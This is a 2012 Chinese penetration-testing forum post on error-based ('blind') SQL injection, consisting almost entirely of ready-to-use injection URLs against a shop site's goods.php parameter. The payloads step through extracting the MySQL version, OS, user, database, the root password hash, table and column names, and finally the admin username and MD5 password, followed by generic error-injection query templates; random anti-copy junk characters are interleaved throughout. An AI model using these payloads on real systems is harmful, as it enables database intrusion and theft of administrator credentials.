找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2074|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号
# Q* n9 Y# U/ u) d' G$ ^1 Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 l4 @0 n: Z6 |! f" |
# {6 o; ]' y8 I$ I
判断系统
- k6 F0 V" X9 \  K2 ]* r1 u) ]. V, t2 C7 y: @" M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 ]; K2 Y9 j% O7 W7 C. \/ T

. g! X1 P. g: P9 q7 s7 w
& U1 w: S5 l% K3 Y, ?% O' c( Z7 j5 B; O
当前 user()
) Q; [- \; R+ F
% m+ G% _- q0 P5 f9 `0 Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& a& ?( O, J8 h* f
( w; @" L( x5 w! {' o7 o( U' Z) _) A7 p
9 ]# {9 }: f/ b. `# ~  w' P
当前 database()
, ?+ e3 F3 R' ~/ M9 z' G! Thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 S& t+ I) X) n  o: p( |* v

  {4 M# F, S6 K6 _, O% h- t
3 D5 I/ |) M( i- s  v" T9 d! v6 [' [5 q2 z/ w+ |% `, r
0 c6 c- x, N  q+ S
root hash/ {6 i6 l" W2 Z3 S) [

7 X* B& v) l: }http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* Z0 [# R9 K& j/ D. u" ?) a1 F
# H# {5 `/ c8 h2 e7 t
, _2 R! Z: W$ d: D' k- H3 p3 I
& J) h7 y) H/ V" F4 W" b& \当前 数据库表名
" v; x- d' t* e7 K8 N* ~; M: C
, f* r+ S) d6 Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 J' {! l( Y2 D( `9 D2 l

5 n& ^) V9 u! f# r  E3 R( u
1 V/ M$ Y. h1 H; L0 t: v
4 T+ K) j! b$ H. ]4 {7 J& w当前 数据库 user_name 字段9 E. ?9 y0 [0 A$ K
- H+ U  Q4 g4 n3 t) F6 ~
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' B) F7 s+ |. c0 {% L1 F, w, ~* O# E/ c1 N
当前 数据库 字段 password
  v7 B: w6 X5 E4 Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! `4 @( X% b3 Z5 y4 [! V7 R8 c5 V! r* O. |; W7 q1 J( f
1 l; l" k6 A" d8 x& f
3 G0 E/ l' U# H4 o
获得 admin passwd(md5)7 {9 V8 r! A2 {/ D, I: c

7 ~* V" v7 a$ S, }3 Y! E; U0 `
4 M* X2 m% s1 O; Y) {http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 K( G" \! N# l8 p3 f2 ]2 S! l
" {3 j& r, C, D1 R; B9 H. N
报错注射
0 ~/ {* o8 |* i& USELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)( e5 M5 y: Q# c! g. E- q) m: E
1 l; _5 x$ }, v& r3 X
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
- Z# K' ^! {, G
" Z% C  S  ?0 S: y  J- G9 W- P% `and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表